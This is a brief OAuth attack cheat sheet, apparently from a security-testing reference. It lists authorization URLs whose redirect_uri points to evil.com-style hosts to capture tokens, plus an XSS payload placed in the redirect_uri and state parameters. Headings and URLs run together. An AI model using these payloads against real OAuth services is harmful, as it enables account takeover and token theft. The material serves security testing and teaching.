OAuth
Grabbing OAuth Token via redirect_uri
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.comhttps://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.comExecuting XSS via redirect_uri
https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>OAuth private key disclosure
Cross-Site Request Forgery
Last updated